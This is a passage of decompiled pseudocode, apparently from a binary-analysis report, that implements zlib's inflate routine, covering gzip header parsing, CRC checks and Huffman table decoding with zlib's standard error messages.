				 *(_t1417 + 0x30) = bpl;
				 *(_t1417 + 0x31) = _t792;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1417 + 0x30);
				_t1039 = r15d;
				 *(__r13 + 8) = 0x3f36;
				_t731 = r15d;
				if (_t731 - 0x20 >= 0) goto 0x191cdbee;
				if (_t1001 == 0) goto 0x191ce19f;
				_t1002 = _t1001 - 1;
				_t1040 = _t1039 + (( *_t1387 & 0x000000ff) << _t731);
				_t1388 =  &(_t1387[1]);
				if (_t731 + 8 - 0x20 < 0) goto 0x191cdbd0;
				_t1308 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1308 == 0) goto 0x191cdbfa;
				 *(_t1308 + 4) = _t1040;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cdc42;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdc42;
				 *(_t1417 + 0x30) = bpl;
				 *(_t1417 + 0x31) = _t1040 >> 8;
				r8d = 4;
				 *((char*)(_t1417 + 0x32)) = _t1040 >> 0x10;
				 *(_t1417 + 0x33) = bpl;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1417 + 0x30);
				_t1042 = r15d;
				 *(__r13 + 8) = 0x3f37;
				_t733 = r15d;
				if (_t733 - 0x10 >= 0) goto 0x191cdc75;
				if (_t1002 == 0) goto 0x191ce19f;
				_t1003 = _t1002 - 1;
				_t1043 = _t1042 + (( *_t1388 & 0x000000ff) << _t733);
				_t1389 =  &(_t1388[1]);
				if (_t733 + 8 - 0x10 < 0) goto 0x191cdc57;
				_t1344 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1344 == 0) goto 0x191cdc93;
				 *(_t1344 + 8) = bpl & 0xffffffff;
				 *( *((intOrPtr*)(__r13 + 0x28)) + 0xc) = _t1043 >> 8;
				goto 0x191cdc98;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cdcca;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdcca;
				 *(_t1417 + 0x30) = bpl;
				 *(_t1417 + 0x31) = _t1043 >> 8;
				r8d = 2;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1417 + 0x30);
				 *(__r13 + 8) = 0x3f38;
				_t735 = r15d;
				if (( *(__r13 + 0x18) & 0x00000400) == 0) goto 0x191cdd53;
				if (_t735 - 0x10 >= 0) goto 0x191cdd05;
				if (_t1003 == 0) goto 0x191ce19f;
				_t1004 = _t1003 - 1;
				_t1045 = r15d + (( *_t1389 & 0x000000ff) << _t735);
				_t1390 =  &(_t1389[1]);
				if (_t735 + 8 - 0x10 < 0) goto 0x191cdce7;
				_t1310 =  *((intOrPtr*)(__r13 + 0x28));
				 *(__r13 + 0x50) = _t1045;
				if (_t1310 == 0) goto 0x191cdd15;
				 *(_t1310 + 0x18) = _t1045;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cdd4b;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdd4b;
				 *(_t1417 + 0x30) = bpl;
				r8d = 2;
				 *(_t1417 + 0x31) = bpl;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1417 + 0x30);
				_t737 = r15d;
				goto 0x191cdd60;
				_t1311 =  *((intOrPtr*)(__r13 + 0x28));
				_t1137 = _t1311;
				if (_t1137 == 0) goto 0x191cdd60;
				 *((long long*)(_t1311 + 0x10)) = __r15;
				 *(__r13 + 8) = 0x3f39;
				asm("bt eax, 0xa");
				if (_t1137 >= 0) goto 0x191cde06;
				_t804 =  *(__r13 + 0x50);
				r14d = _t1004;
				r14d =  <=  ? _t804 : r14d;
				if (r14d == 0) goto 0x191cddfe;
				_t1363 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1363 == 0) goto 0x191cddcd;
				_t1431 =  *((intOrPtr*)(_t1363 + 0x10));
				if (_t1431 == 0) goto 0x191cddcd;
				r8d =  *(_t1363 + 0x1c);
				r9d =  *(_t1363 + 0x18);
				r9d = r9d - _t804;
				_t574 =  >  ? r8d - r9d : r14d;
				_t1345 = _t1344 + _t1431;
				r8d =  >  ? r8d - r9d : r14d;
				E00007FF77FF7191D4380();
				asm("bt eax, 0x9");
				if (__r14 + __r9 - r8d >= 0) goto 0x191cdded;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdded;
				r8d = r14d;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1390);
				_t1005 = _t1004 - r14d;
				_t1391 =  &(_t1390[_t1311]);
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				if ( *(__r13 + 0x50) != 0) goto 0x191ce19f;
				 *(__r13 + 0x50) = r15d;
				 *(__r13 + 8) = 0x3f3a;
				if (( *(__r13 + 0x18) & 0x00000800) == 0) goto 0x191cdea3;
				if (_t1005 == 0) goto 0x191ce19f;
				r14d = r15d;
				r14d = r14d + 1;
				r15d =  *(_t1311 + _t1391) & 0x000000ff;
				_t1312 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1312 == 0) goto 0x191cde5e;
				_t1366 =  *((intOrPtr*)(_t1312 + 0x20));
				if (_t1366 == 0) goto 0x191cde5e;
				if ( *(__r13 + 0x50) -  *((intOrPtr*)(_t1312 + 0x28)) >= 0) goto 0x191cde5e;
				 *((intOrPtr*)(_t1345 + _t1366)) = r15b;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + 1;
				if (r15b == 0) goto 0x191cde68;
				if (r14d - _t1005 < 0) goto 0x191cde30;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cde8c;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cde8c;
				r8d = r14d;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1391);
				_t1006 = _t1005 - r14d;
				_t1392 =  &(_t1391[_t1312]);
				if (r15b != 0) goto 0x191ce19f;
				r15d = 0;
				goto 0x191cdeb0;
				_t1313 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1313 == 0) goto 0x191cdeb0;
				 *((long long*)(_t1313 + 0x20)) = __r15;
				 *(__r13 + 0x50) = r15d;
				 *(__r13 + 8) = 0x3f3b;
				if (( *(__r13 + 0x18) & 0x00001000) == 0) goto 0x191cdf44;
				if (_t1006 == 0) goto 0x191ce19f;
				r14d = r15d;
				r14d = r14d + 1;
				r15d =  *(_t1313 + _t1392) & 0x000000ff;
				_t1314 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1314 == 0) goto 0x191cdeff;
				_t1368 =  *((intOrPtr*)(_t1314 + 0x30));
				if (_t1368 == 0) goto 0x191cdeff;
				if ( *(__r13 + 0x50) -  *((intOrPtr*)(_t1314 + 0x38)) >= 0) goto 0x191cdeff;
				 *((intOrPtr*)(_t1345 + _t1368)) = r15b;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + 1;
				if (r15b == 0) goto 0x191cdf09;
				if (r14d - _t1006 < 0) goto 0x191cded1;
				if (( *(__r13 + 0x18) & 0x00000200) == 0) goto 0x191cdf2d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdf2d;
				r8d = r14d;
				_t1369 = _t1392;
				 *(__r13 + 0x20) = E00007FF77FF7191CF4C0(_t1369);
				_t1007 = _t1006 - r14d;
				_t1393 =  &(_t1392[_t1314]);
				if (r15b != 0) goto 0x191ce19f;
				r15d = 0;
				goto 0x191cdf51;
				_t1315 =  *((intOrPtr*)(__r13 + 0x28));
				_t1166 = _t1315;
				if (_t1166 == 0) goto 0x191cdf51;
				 *((long long*)(_t1315 + 0x30)) = __r15;
				r10d =  *(_t1417 + 0xb8);
				 *(__r13 + 8) = 0x3f3c;
				asm("bt edx, 0x9");
				if (_t1166 >= 0) goto 0x191cdfba;
				if (_t737 - 0x10 >= 0) goto 0x191cdf8e;
				if (_t1007 == 0) goto 0x191ce19f;
				_t1008 = _t1007 - 1;
				_t1394 =  &(_t1393[1]);
				if (_t737 + 8 - 0x10 < 0) goto 0x191cdf70;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cdfb4;
				if (r15d + (( *_t1393 & 0x000000ff) << _t737) == ( *(__r13 + 0x20) & 0x0000ffff)) goto 0x191cdfb4;
				 *(__r12 + 0x20) = "header crc mismatch";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191cdffc;
				_t1049 = r15d;
				_t739 = r15d;
				_t1317 =  *((intOrPtr*)(__r13 + 0x28));
				if (_t1317 == 0) goto 0x191cdfd7;
				 *(_t1317 + 0x3c) =  *(__r13 + 0x18) >> 0x00000009 & 0x00000001;
				_t1318 =  *((intOrPtr*)(__r13 + 0x28));
				 *( *((intOrPtr*)(__r13 + 0x28)) + 0x40) = 1;
				r8d = 0;
				_t587 = E00007FF77FF7191CF4C0(_t1369);
				 *(__r13 + 0x20) = _t587;
				 *(__r12 + 0x4c) = _t587;
				 *(__r13 + 8) = 0x3f3f;
				r10d =  *(_t1417 + 0xb8);
				_t1421 =  *((intOrPtr*)(_t1417 + 0x40));
				_t186 = _t1369 - 0x3f34; // 0x14
				if (_t186 - 0x1f > 0) goto 0x191cf005;
				r8d =  *(_t1417 + 0xa0);
				r15d = 0;
				r14d =  *(_t1417 + 0xa8);
				if (_t739 - 0x20 >= 0) goto 0x191ce04f;
				if (_t1008 == 0) goto 0x191ce19f;
				_t1009 = _t1008 - 1;
				_t1395 =  &(_t1394[1]);
				if (_t739 + 8 - 0x20 < 0) goto 0x191ce031;
				_t741 = r15d;
				_t597 = (_t1049 + (( *_t1394 & 0x000000ff) << _t739) >> 0x00000008 & 0x0000ff00) + ((_t1049 + (( *_t1394 & 0x000000ff) << _t739) & 0x0000ff00) + (_t1049 + (( *_t1394 & 0x000000ff) << _t739) << 0x10) << 8) + (_t1049 + (( *_t1394 & 0x000000ff) << _t739) >> 0x18);
				 *(__r13 + 0x20) = _t597;
				 *(__r12 + 0x4c) = _t597;
				 *(__r13 + 8) = 0x3f3e;
				if ( *((intOrPtr*)(__r13 + 0x14)) == 0) goto 0x191ceec0;
				r8d = 0;
				_t598 = E00007FF77FF7191CF7F0(0, _t1318, _t1369, __r8, _t1421);
				r10d =  *(_t1417 + 0xb8);
				 *(__r13 + 0x20) = _t598;
				 *(__r12 + 0x4c) = _t598;
				 *(__r13 + 8) = 0x3f3f;
				if (__r14 - 5 - 1 <= 0) goto 0x191ce19f;
				if ( *(__r13 + 0xc) == 0) goto 0x191ce0e3;
				 *(__r13 + 8) = 0x3f4e;
				_t822 = _t741 & 0x00000007;
				_t742 = _t741 - _t822;
				goto 0x191cdffc;
				if (_t742 - 3 >= 0) goto 0x191ce106;
				if (_t1009 == 0) goto 0x191ce19f;
				_t1010 = _t1009 - 1;
				_t1054 = (r15d >> _t822) + (( *_t1395 & 0x000000ff) << _t742);
				_t1396 =  &(_t1395[1]);
				_t743 = _t742 + 8;
				_t1182 = _t743 - 3;
				if (_t1182 < 0) goto 0x191ce0e8;
				_t1055 = _t1054 >> 1;
				 *(__r13 + 0xc) = _t1054 & 0x00000001;
				if (_t1182 == 0) goto 0x191ce23d;
				if (_t1182 == 0) goto 0x191ce161;
				if (_t1182 == 0) goto 0x191ce14e;
				if ((_t1055 & 0x00000003) != 1) goto 0x191ce245;
				 *(__r12 + 0x20) = "invalid block type";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191cdffc;
				 *(__r13 + 8) = 0x3f44;
				goto 0x191cdffc;
				 *(__r13 + 0x70) = 9;
				 *(__r13 + 0x60) = 0x191fec40;
				 *((long long*)(__r13 + 0x68)) = 0x191ff440;
				 *((intOrPtr*)(__r13 + 0x74)) = 5;
				 *(__r13 + 8) = 0x3f47;
				if (r14d != 6) goto 0x191ce245;
				_t1058 = _t1055 >> 2 >> 2 >> 2;
				_t746 = _t743 + 0x2fffffff7;
				r14d =  *(_t1417 + 0xa0);
				r15d =  *(_t1417 + 0xb0);
				 *((long long*)(__r12 + 0x10)) =  *((intOrPtr*)(_t1417 + 0x40));
				 *(__r12 + 0x18) =  *(_t1417 + 0xb8);
				 *__r12 = _t1396;
				 *((intOrPtr*)(__r12 + 8)) = _t1010;
				 *(__r13 + 0x48) = _t1058;
				 *(__r13 + 0x4c) = _t746;
				if ( *((intOrPtr*)(__r13 + 0x34)) != 0) goto 0x191ce20e;
				if (r14d ==  *(__r12 + 0x18)) goto 0x191cef31;
				_t609 =  *(__r13 + 8);
				if (_t609 - 0x3f51 >= 0) goto 0x191cef31;
				if (_t609 - 0x3f4e < 0) goto 0x191ce20e;
				if ( *(_t1417 + 0xa8) == 4) goto 0x191cef31;
				r8d = r14d;
				r8d = r8d -  *(__r12 + 0x18);
				_t610 = E00007FF77FF7191CF3B0(0x191ff440, _t1342, __r12,  *((intOrPtr*)(__r12 + 0x10)), _t1415); // executed
				if (_t610 == 0) goto 0x191cef31;
				 *(__r13 + 8) = 0x3f52;
				goto 0x191cf00a;
				 *(__r13 + 8) = 0x3f41;
				_t1059 = _t1058 >> 2;
				_t747 = _t746 + 0xfffffffd;
				_t825 = _t747 & 0x00000007;
				_t748 = _t747 - _t825;
				if (_t748 - 0x20 >= 0) goto 0x191ce27e;
				if (_t1010 == 0) goto 0x191ce19f;
				_t1011 = _t1010 - 1;
				_t1061 = (_t1059 >> _t825) + (( *_t1396 & 0x000000ff) << _t748);
				if (_t748 + 8 - 0x20 < 0) goto 0x191ce260;
				_t827 = _t1061 & 0x0000ffff;
				if (_t827 ==  !_t1061 >> 0x10) goto 0x191ce2a5;
				_t1322 = "invalid stored block lengths";
				 *(__r12 + 0x20) = _t1322;
				 *(__r13 + 8) = 0x3f51;
				goto 0x191ce001;
				 *(__r13 + 0x50) = _t827;
				_t1062 = r15d;
				 *(__r13 + 8) = 0x3f42;
				_t750 = r15d;
				if (r14d == 6) goto 0x191ce19f;
				 *(__r13 + 8) = 0x3f43;
				_t828 =  *(__r13 + 0x50);
				if (_t828 == 0) goto 0x191ce32b;
				r14d = r10d;
				_t618 =  <=  ? _t828 : _t1011;
				r14d =  <=  ?  <=  ? _t828 : _t1011 : r14d;
				if (r14d == 0) goto 0x191ce19f;
				r8d = r14d;
				E00007FF77FF7191D4380();
				r10d =  *(_t1417 + 0xb8);
				_t1012 = _t1011 - r14d;
				r10d = r10d - r14d;
				 *(_t1417 + 0xb8) = r10d;
				_t1398 =  &(( &(_t1396[1]))[_t1322]);
				 *((long long*)(_t1417 + 0x40)) =  *((intOrPtr*)(_t1417 + 0x40)) + _t1322;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) - r14d;
				goto 0x191ce001;
				 *(__r13 + 8) = 0x3f3f;
				if (_t750 - 0xe >= 0) goto 0x191ce35e;
				if (_t1012 == 0) goto 0x191ce19f;
				_t1013 = _t1012 - 1;
				_t1063 = _t1062 + (( *_t1398 & 0x000000ff) << _t750);
				_t1399 =  &(_t1398[1]);
				_t751 = _t750 + 8;
				if (_t751 - 0xe < 0) goto 0x191ce340;
				_t752 = _t751 + 0xfffffff2;
				_t1064 = _t1063 >> 5;
				_t832 = (_t1063 & 0x0000001f) + 0x101;
				_t1065 = _t1064 >> 5;
				 *(__r13 + 0x7c) = _t832;
				_t964 = (_t1064 & 0x0000001f) + 1;
				 *(__r13 + 0x80) = _t964;
				 *((intOrPtr*)(__r13 + 0x78)) = (_t1065 & 0x0000000f) + 4;
				if (_t832 - 0x11e > 0) goto 0x191ce4c0;
				if (_t964 - 0x1e > 0) goto 0x191ce4c0;
				 *(__r13 + 0x84) = r15d;
				 *(__r13 + 8) = 0x3f45;
				if ( *(__r13 + 0x84) -  *((intOrPtr*)(__r13 + 0x78)) >= 0) goto 0x191ce428;
				if (_t752 - 3 >= 0) goto 0x191ce3ee;
				if (_t1013 == 0) goto 0x191ce19f;
				_t1014 = _t1013 - 1;
				_t1067 = (_t1065 >> 4) + (( *_t1399 & 0x000000ff) << _t752);
				_t1400 =  &(_t1399[1]);
				_t753 = _t752 + 8;
				if (_t753 - 3 < 0) goto 0x191ce3d0;
				_t754 = _t753 + 0xfffffffd;
				 *(__r13 + 0x90 + _t1322 * 2) = _t1067 & 7;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				_t630 =  *(__r13 + 0x84);
				if (_t630 -  *((intOrPtr*)(__r13 + 0x78)) < 0) goto 0x191ce3c4;
				if (_t630 - 0x13 >= 0) goto 0x191ce45a;
				 *(__r13 + 0x90 + _t1322 * 2) = r15w;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				if ( *(__r13 + 0x84) - 0x13 < 0) goto 0x191ce430;
				_t1349 = __r13 + 0x70;
				_t1323 = __r13 + 0x550;
				 *_t1349 = 7;
				 *(__r13 + 0x60) = _t1323;
				 *(__r13 + 0x88) = _t1323;
				 *((long long*)(_t1417 + 0x28)) = __r13 + 0x310;
				 *(_t1417 + 0x20) = _t1349;
				_t275 = _t1349 + 0x13; // 0x13
				r8d = _t275;
				_t633 = E00007FF77FF7191CFB00(0, __r13 + 0x90, _t1415, __r13 + 0x88, __r12);
				 *(_t1417 + 0xb0) = _t633;
				if (_t633 == 0) goto 0x191ce4d9;
				 *(_t1436 + 0x20) = "invalid code lengths set";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191cdff4;
				_t1326 = "too many length or distance symbols";
				 *(_t1436 + 0x20) = _t1326;
				 *(__r13 + 8) = 0x3f51;
				goto 0x191ce001;
				 *(__r13 + 0x84) = r15d;
				 *(__r13 + 8) = 0x3f46;
				r10d =  *(__r13 + 0x7c);
				if ( *(__r13 + 0x84) -  *(__r13 + 0x80) + r10d >= 0) goto 0x191ce702;
				r9d = 1;
				_t1432 =  *(__r13 + 0x60);
				r9d = r9d <<  *(__r13 + 0x70);
				r9d = r9d - 1;
				_t1350 = _t1349 & _t1326;
				_t635 =  *(_t1432 + _t1350 * 4);
				r8d = _t635;
				r8d = r8d >> 0x10;
				 *(_t1417 + 0x34) = _t635;
				if ((_t635 >> 0x00000008 & 0x000000ff) - _t754 <= 0) goto 0x191ce583;
				if (_t1014 == 0) goto 0x191ce19f;
				_t1015 = _t1014 - 1;
				_t1401 =  &(_t1400[1]);
				_t755 = _t754 + 8;
				_t1327 = _t1326 & _t1350;
				_t639 =  *(_t1432 + _t1327 * 4);
				_t969 = _t639 >> 8;
				r8d = _t639;
				r8d = r8d >> 0x10;
				 *(_t1417 + 0x34) = _t639;
				if ((_t969 & 0x000000ff) - _t755 > 0) goto 0x191ce547;
				_t1217 = r8w - 0x10;
				if (_t1217 >= 0) goto 0x191ce5ba;
				_t756 = _t755 - (_t969 & 0x000000ff);
				 *((short*)(__r13 + 0x90 + _t1350 * 2)) = _t639 >> 0x10;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				r8d =  *(__r13 + 0x84);
				goto 0x191ce6e7;
				if (_t1217 != 0) goto 0x191ce619;
				_t971 = (_t969 & 0x000000ff) + 2;
				if (_t756 - _t971 >= 0) goto 0x191ce5e3;
				if (_t1015 == 0) goto 0x191ce19f;
				_t1016 = _t1015 - 1;
				_t1402 =  &(_t1401[1]);
				_t757 = _t756 + 8;
				if (_t757 - _t971 < 0) goto 0x191ce5c6;
				_t849 =  *(_t1417 + 0x35) & 0x000000ff;
				_t1072 = ((_t1067 >> 3) + (( *_t1400 & 0x000000ff) << _t754) >> (_t969 & 0x000000ff)) + (( *_t1401 & 0x000000ff) << _t756) >> _t849;
				if ( *(__r13 + 0x84) == 0) goto 0x191ce732;
				_t759 = _t757 - _t849 + 0xfffffffe;
				r9d =  *(__r13 + 0x90 + _t1327 * 2) & 0x0000ffff;
				goto 0x191ce6a3;
				if (r8w != 0x11) goto 0x191ce660;
				_t975 = (_t1072 & 0x00000003) + 6;
				if (_t759 - _t975 >= 0) goto 0x191ce644;
				if (_t1016 == 0) goto 0x191ce19f;
				_t1017 = _t1016 - 1;
				_t1403 =  &(_t1402[1]);
				_t760 = _t759 + 8;
				if (_t760 - _t975 < 0) goto 0x191ce627;
				_t1075 = (_t1072 >> 2) + (( *_t1402 & 0x000000ff) << _t759) >> ( *(_t1417 + 0x35) & 0x000000ff);
				r9d = r15d;
				goto 0x191ce69f;
				_t979 = (_t1075 & 0x00000007) + 0xa;
				if (_t760 - _t979 >= 0) goto 0x191ce684;
				if (_t1017 == 0) goto 0x191ce19f;
				_t1018 = _t1017 - 1;
				_t761 = _t760 + 8;
				if (_t761 - _t979 < 0) goto 0x191ce667;
				_t853 =  *(_t1417 + 0x35) & 0x000000ff;
				_t1078 = (_t1075 >> 3) + (( *_t1403 & 0x000000ff) << _t760) >> _t853;
				r9d = r15w & 0xffffffff;
				_t1229 =  *(__r13 + 0x84) + (_t1078 & 0x0000007f) + 0xb -  *(__r13 + 0x80) +  *(__r13 + 0x7c);
				if (_t1229 > 0) goto 0x191ce732;
				 *(__r13 + 0x90 + _t1327 * 2) = r9w;
				r8d =  *(__r13 + 0x84);
				r8d = __r8 + 1;
				 *(__r13 + 0x84) = r8d;
				if (_t1229 != 0) goto 0x191ce6c0;
				r10d =  *(__r13 + 0x7c);
				if (r8d -  *(__r13 + 0x80) + r10d < 0) goto 0x191ce510;
				if ( *(__r13 + 8) == 0x3f51) goto 0x191cdff4;
				if ( *((short*)(__r13 + 0x290)) != 0) goto 0x191ce74b;
				 *(_t1436 + 0x20) = "invalid code -- missing end-of-block";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191cdff4;
				 *(_t1436 + 0x20) = "invalid bit length repeat";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191cdff4;
				_t1330 = __r13 + 0x550;
				 *(__r13 + 0x70) = 9;
				 *(__r13 + 0x88) = _t1330;
				_t1443 = __r13 + 0x310;
				 *(__r13 + 0x60) = _t1330;
				 *((long long*)(_t1417 + 0x28)) = _t1443;
				 *(_t1417 + 0x20) = __r13 + 0x70;
				r8d = r10d;
				_t655 = E00007FF77FF7191CFB00(1, __r13 + 0x90, _t1415, __r13 + 0x88, _t1436);
				 *(_t1417 + 0xb0) = _t655;
				if (_t655 == 0) goto 0x191ce7b9;
				 *(_t1436 + 0x20) = "invalid literal/lengths set";
				 *(__r13 + 8) = 0x3f51;
				goto 0x191cdff4;
				_t1351 = __r13 + 0x74;
				r8d =  *(__r13 + 0x80);
				 *((long long*)(__r13 + 0x68)) =  *(__r13 + 0x88);
				 *_t1351 = 6;
				 *((long long*)(_t1417 + 0x28)) = _t1443;
				 *(_t1417 + 0x20) = _t1351;
				_t657 = E00007FF77FF7191CFB00(2, 0x90 +  *(__r13 + 0x88) * 2 + __r13, _t1415, __r13 + 0x88, _t1436);
				 *(_t1417 + 0xb0) = _t657;
				r15d = _t657;
				if (_t657 == 0) goto 0x191ce826;
				_t1334 = "invalid distances set";
				 *(_t1436 + 0x20) = _t1334;
				 *(__r13 + 8) = 0x3f51;
				goto 0x191cdff4;
				 *(__r13 + 8) = 0x3f47;
				if ( *(_t1417 + 0xa8) == 6) goto 0x191cef24;
				r8d =  *(_t1417 + 0xa0);
				r15d = 0;
				r10d =  *(_t1417 + 0xb8);
				 *(__r13 + 8) = 0x3f48;
				if (_t1018 - 6 < 0) goto 0x191ce8d8;
				if (r10d - 0x102 < 0) goto 0x191ce8d8;
				 *((long long*)(_t1436 + 0x10)) =  *((intOrPtr*)(_t1417 + 0x40));
				_t1353 = _t1436;
				 *(_t1436 + 0x18) = r10d;
				 *_t1436 =  &(_t1403[1]);
				 *((intOrPtr*)(_t1436 + 8)) = _t1018;
				 *(__r13 + 0x48) = _t1078 >> 7;
				 *(__r13 + 0x4c) = _t761 + 0xfffffff9 - _t853;
				E00007FF77FF7191D00C0(r8d, _t1028, _t1334, _t1353, _t1432, _t1435);
				r10d =  *(_t1436 + 0x18);
				_t1405 =  *_t1436;
				_t1019 =  *((intOrPtr*)(_t1436 + 8));
				_t763 =  *(__r13 + 0x4c);
				 *((long long*)(_t1417 + 0x40)) =  *((intOrPtr*)(_t1436 + 0x10));
				 *(_t1417 + 0xb8) = r10d;
				if ( *(__r13 + 8) != 0x3f3f) goto 0x191ce001;
				 *(__r13 + 0x1be4) = 0xffffffff;
				goto 0x191ce001;
				_t1433 =  *(__r13 + 0x60);
				_t1354 = _t1353 & _t1334;
				 *(__r13 + 0x1be4) = r15d;
				if (( *(_t1433 + _t1354 * 4) >> 0x00000008 & 0x000000ff) - _t763 <= 0) goto 0x191ce937;
				if (_t1019 == 0) goto 0x191ce19f;
				_t1020 = _t1019 - 1;
				_t1081 =  *(__r13 + 0x48) + (( *_t1405 & 0x000000ff) << _t763);
				_t1406 =  &(_t1405[1]);
				_t764 = _t763 + 8;
				_t664 =  *(_t1433 + (_t1334 & _t1354) * 4);
				if ((_t664 >> 0x00000008 & 0x000000ff) - _t764 > 0) goto 0x191ce907;
				if (_t664 == 0) goto 0x191ce9f3;
				if ((_t664 & 0x000000f0) != 0) goto 0x191ce9f3;
				 *(_t1417 + 0x34) = _t664;
				r14d =  *(_t1417 + 0x35) & 0x000000ff;
				r8d = 1;
				r9d = _t664 >> 0x00000008 & 0x000000ff;
				r8d = r8d << (_t664 & 0x000000ff) + r9d;
				r8d = r8d - 1;
				r8d = r8d & _t1081;
				r8d = r8d >> r9d;
				r8d = r8d + (_t664 >> 0x10);
				r8d =  *(_t1433 + _t1419 * 4) >> 0x00000008 & 0x000000ff;
				r8d = r8d + r9d;
				if (r8d - _t764 <= 0) goto 0x191ce9e4;
				r11d =  *(_t1417 + 0x36) & 0x0000ffff;
				if (_t1020 == 0) goto 0x191ce19f;
				r8d = 1;
				_t1082 = _t1081 + (( *_t1406 & 0x000000ff) << _t764);
				_t1021 = _t1020 - 1;
				r8d = r8d << (_t664 & 0x000000ff) + r14d;
				_t1407 =  &(_t1406[1]);
				r8d = r8d - 1;
				r8d = r8d & _t1082;
				_t765 = _t764 + 8;
				r8d = r8d >> r14d;
				r8d = r8d + r11d;
				_t669 =  *(_t1433 + _t1419 * 4);
				r8d = _t669 >> 0x00000008 & 0x000000ff;
				r8d = r8d + r14d;
				if (r8d - _t765 > 0) goto 0x191ce998;
				_t883 = r14d;
				 *(__r13 + 0x1be4) = _t883;
				_t886 = _t669 >> 0x00000008 & 0x000000ff;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t886;
				_t767 = _t765 - r14d - _t886;
				 *(__r13 + 0x50) = _t669 >> 0x10;
				if (_t669 != 0) goto 0x191cea20;
				 *(__r13 + 8) = 0x3f4d;
				goto 0x191cdff4;
				if ((_t669 & 0x00000020) == 0) goto 0x191cea34;
				 *(__r13 + 0x1be4) = 0xffffffff;
				goto 0x191cdfec;
				if ((_t669 & 0x00000040) == 0) goto 0x191cea51;
				_t1336 = "invalid literal/length code";
				 *(_t1436 + 0x20) = _t1336;
				 *(__r13 + 8) = 0x3f51;
				goto 0x191cdff4;
				 *(__r13 + 8) = 0x3f49;
				 *(__r13 + 0x58) = _t669 & 0xf;
				_t991 =  *(__r13 + 0x58);
				if (_t991 == 0) goto 0x191ceaa9;
				if (_t767 - _t991 >= 0) goto 0x191cea8d;
				if (_t1021 == 0) goto 0x191ce19f;
				_t1022 = _t1021 - 1;
				_t1085 = (_t1082 >> _t883 >> _t886) + (( *_t1407 & 0x000000ff) << _t767);
				_t1408 =  &(_t1407[1]);
				_t768 = _t767 + 8;
				if (_t768 - _t991 < 0) goto 0x191cea70;
				_t892 = _t991;
				_t769 = _t768 - _t991;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + ((0x00000001 << _t892) - 0x00000001 & _t1085);
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t991;
				 *(__r13 + 0x1be8) =  *(__r13 + 0x50);
				 *(__r13 + 8) = 0x3f4a;
				_t1434 =  *((intOrPtr*)(__r13 + 0x68));
				_t1355 = _t1354 & _t1336;
				if (( *(_t1434 + _t1355 * 4) >> 0x00000008 & 0x000000ff) - _t769 <= 0) goto 0x191ceb14;
				if (_t1022 == 0) goto 0x191ce19f;
				_t1023 = _t1022 - 1;
				_t1087 = (_t1085 >> _t892) + (( *_t1408 & 0x000000ff) << _t769);
				_t1409 =  &(_t1408[1]);
				_t770 = _t769 + 8;
				_t682 =  *(_t1434 + (_t1336 & _t1355) * 4);
				if ((_t682 >> 0x00000008 & 0x000000ff) - _t770 > 0) goto 0x191ceae4;
				if ((_t682 & 0x000000f0) != 0) goto 0x191cebcb;
				 *(_t1417 + 0x34) = _t682;
				r14d =  *(_t1417 + 0x35) & 0x000000ff;
				r8d = 1;
				r9d = _t682 >> 0x00000008 & 0x000000ff;
				r8d = r8d << (_t682 & 0x000000ff) + r9d;
				r8d = r8d - 1;
				r8d = r8d & _t1087;
				r8d = r8d >> r9d;
				r8d = r8d + (_t682 >> 0x10);
				r8d =  *(_t1434 + _t1419 * 4) >> 0x00000008 & 0x000000ff;
				r8d = r8d + r9d;
				if (r8d - _t770 <= 0) goto 0x191cebbc;
				r11d =  *(_t1417 + 0x36) & 0x0000ffff;
				if (_t1023 == 0) goto 0x191ce19f;
				r8d = 1;
				_t1088 = _t1087 + (( *_t1409 & 0x000000ff) << _t770);
				_t1024 = _t1023 - 1;
				r8d = r8d << (_t682 & 0x000000ff) + r14d;
				_t1410 =  &(_t1409[1]);
				r8d = r8d - 1;
				r8d = r8d & _t1088;
				_t771 = _t770 + 8;
				r8d = r8d >> r14d;
				r8d = r8d + r11d;
				_t687 =  *(_t1434 + _t1419 * 4);
				r8d = _t687 >> 0x00000008 & 0x000000ff;
				r8d = r8d + r14d;
				if (r8d - _t771 > 0) goto 0x191ceb70;
				_t916 = r14d;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t916;
				r10d =  *(_t1417 + 0xb8);
